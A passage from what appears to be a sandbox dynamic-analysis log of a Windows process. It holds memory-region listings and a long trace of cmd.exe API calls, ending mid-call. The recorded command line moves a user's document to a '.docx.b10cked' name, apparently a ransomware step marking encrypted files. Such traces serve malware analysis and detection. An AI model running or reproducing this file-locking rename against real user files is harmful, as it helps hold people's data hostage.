"\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13286 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13287 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13288 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 13289 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13290 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" 
(normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13291 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 13292 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 13293 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 13294 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 13295 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 13296 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13297 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 184 os_tid = 0xb70 [0134.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f9a4 | out: lpSystemTimeAsFileTime=0x28f9a4*(dwLowDateTime=0x89f97240, dwHighDateTime=0x1d440a9)) [0134.279] GetCurrentProcessId () returned 0xc4c [0134.279] GetCurrentThreadId () returned 0xb70 [0134.279] GetTickCount () returned 0x2a977 [0134.279] QueryPerformanceCounter (in: lpPerformanceCount=0x28f99c | out: lpPerformanceCount=0x28f99c*=19106844858) returned 1 [0134.280] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0134.280] __set_app_type (_Type=0x1) [0134.280] __p__fmode () returned 0x76b331f4 [0134.280] __p__commode () returned 0x76b331fc [0134.280] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0134.280] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | 
out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0134.280] GetCurrentThreadId () returned 0xb70 [0134.281] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb70) returned 0x38 [0134.281] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.281] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0134.281] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.281] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.281] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f934 | out: phkResult=0x28f934*=0x0) returned 0x2 [0134.281] VirtualQuery (in: lpAddress=0x28f96b, lpBuffer=0x28f904, dwLength=0x1c | out: lpBuffer=0x28f904*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.281] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f904, dwLength=0x1c | out: lpBuffer=0x28f904*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0134.281] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f904, dwLength=0x1c | out: lpBuffer=0x28f904*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0134.281] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f904, dwLength=0x1c | out: lpBuffer=0x28f904*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.281] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f904, dwLength=0x1c | out: lpBuffer=0x28f904*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, 
RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0134.281] GetConsoleOutputCP () returned 0x1b5 [0134.281] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.282] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0134.282] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.282] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0134.282] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.282] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.282] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.282] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.282] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.282] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.282] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.282] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0134.283] GetEnvironmentStringsW () returned 0x3901b0* [0134.283] FreeEnvironmentStringsW (penv=0x3901b0) returned 1 [0134.283] GetEnvironmentStringsW () returned 0x3901b0* [0134.283] FreeEnvironmentStringsW (penv=0x3901b0) returned 1 [0134.283] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e8a4 | out: phkResult=0x28e8a4*=0x40) returned 0x0 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0xe8, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x1, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", 
lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0x1, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x0, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x40, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x40, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0x40, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.284] RegCloseKey (hKey=0x40) returned 0x0 [0134.284] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e8a4 | out: phkResult=0x28e8a4*=0x40) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0x40, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x1, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, 
lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0x1, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x0, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x9, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x9, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0x9, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.284] RegCloseKey (hKey=0x40) returned 0x0 [0134.284] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886368 [0134.284] srand (_Seed=0x5b886368) [0134.284] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked\"" [0134.284] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked\"" [0134.284] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.285] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x391910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b 
[0134.285] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0134.285] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.285] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.285] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0134.285] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0134.285] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0134.285] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0134.285] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0134.285] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0134.285] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0134.285] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0134.285] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0134.286] GetEnvironmentStringsW () returned 0x392300* [0134.286] FreeEnvironmentStringsW (penv=0x392300) returned 1 [0134.286] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.286] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.286] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0134.286] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0134.286] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0134.286] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0134.286] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0134.286] _wcsicmp (_String1="KEYS", 
_String2="TIME") returned -9 [0134.286] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0134.286] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0134.286] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f670 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.286] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f670, lpFilePart=0x28f66c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f66c*="Desktop") returned 0x18 [0134.286] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.287] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f3ec | out: lpFindFileData=0x28f3ec) returned 0x390040 [0134.287] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0134.287] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f3ec | out: lpFindFileData=0x28f3ec) returned 0x390040 [0134.287] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0134.287] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f3ec | out: lpFindFileData=0x28f3ec) returned 0x390040 [0134.287] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0134.287] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.288] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0134.288] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0134.288] GetEnvironmentStringsW () returned 0x392b20* [0134.288] FreeEnvironmentStringsW (penv=0x392b20) returned 1 [0134.288] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.289] GetConsoleOutputCP () returned 
0x1b5 [0134.289] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.289] GetUserDefaultLCID () returned 0x409 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f7b0, cchData=128 | out: lpLCData="0") returned 2 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f7b0, cchData=128 | out: lpLCData="0") returned 2 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f7b0, cchData=128 | out: lpLCData="1") returned 2 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0134.290] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0134.291] GetConsoleTitleW (in: 
lpConsoleTitle=0x380900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.291] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.291] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0134.291] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0134.291] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0134.292] _wcsicmp (_String1="move", _String2=")") returned 68 [0134.292] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0134.292] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0134.292] _wcsicmp (_String1="IF", _String2="move") returned -4 [0134.292] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0134.292] _wcsicmp (_String1="REM", _String2="move") returned 5 [0134.292] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0134.296] GetConsoleTitleW (in: lpConsoleTitle=0x28f4a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.382] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0134.382] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0134.382] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0134.382] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0134.382] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0134.382] _wcsicmp (_String1="move", _String2="CD") returned 10 [0134.382] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0134.382] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0134.382] _wcsicmp (_String1="move", _String2="REN") returned -5 [0134.382] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0134.382] _wcsicmp (_String1="move", _String2="SET") returned -6 [0134.382] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0134.382] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0134.382] _wcsicmp (_String1="move", 
_String2="TIME") returned -7 [0134.382] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0134.382] _wcsicmp (_String1="move", _String2="MD") returned 11 [0134.382] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0134.382] _wcsicmp (_String1="move", _String2="RD") returned -5 [0134.382] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0134.382] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0134.382] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0134.382] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0134.382] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0134.382] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0134.382] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0134.382] _wcsicmp (_String1="move", _String2="VER") returned -9 [0134.382] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0134.382] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0134.382] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0134.383] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0134.383] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0134.383] _wcsicmp (_String1="move", _String2="START") returned -6 [0134.383] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0134.383] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0134.383] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0134.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0134.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0134.384] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f264, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f25c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f25c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.385] 
_wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", 
_String2="PSModul", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0134.386] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0134.386] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0134.386] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0134.386] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0134.386] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0134.386] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0134.386] _wcsicmp (_String1="TQ3YPK~1.DOC", _String2=".") returned 70 [0134.386] _wcsicmp (_String1="TQ3YPK~1.DOC", _String2="..") returned 70 [0134.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk~1.doc")) returned 0x20 [0134.386] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.386] SetErrorMode (uMode=0x0) returned 0x0 [0134.387] SetErrorMode (uMode=0x1) returned 0x0 [0134.387] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", nBufferLength=0x104, lpBuffer=0x28ebec, lpFilePart=0x28ebd4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", lpFilePart=0x28ebd4*="TQ3YPK~1.DOC") returned 0x33 [0134.387] SetErrorMode (uMode=0x0) returned 0x1 [0134.387] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1")) 
